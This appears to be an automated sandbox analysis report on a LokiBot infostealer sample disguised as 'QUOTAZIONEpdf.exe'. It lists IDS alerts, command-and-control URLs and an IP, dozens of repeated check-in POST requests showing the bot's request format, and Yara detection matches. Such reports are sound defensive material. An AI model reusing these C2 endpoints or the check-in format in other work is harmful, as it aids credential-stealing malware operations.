          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49865 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49865 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49866 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49866 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49866 -> 104.223.93.105:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
          Source: Malware configuration extractorURLs: http://slimpackage.com/slimmain/five/fre.php
          Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
          Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
          Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 190Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 190Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 08:52:37 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 08:52:39 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: QUOTAZIONEpdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: QUOTAZIONEpdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmpString found in binary or memory: http://slimpackage.com/slimmain/five/fre.php
          Source: QUOTAZIONEpdf.exe, QUOTAZIONEpdf.exe, 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, QUOTAZIONEpdf.exe, 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
          Source: unknownHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 190Connection: close
          Source: unknownDNS traffic detected: queries for: slimpackage.com
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00404ED4 recv,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: QUOTAZIONEpdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
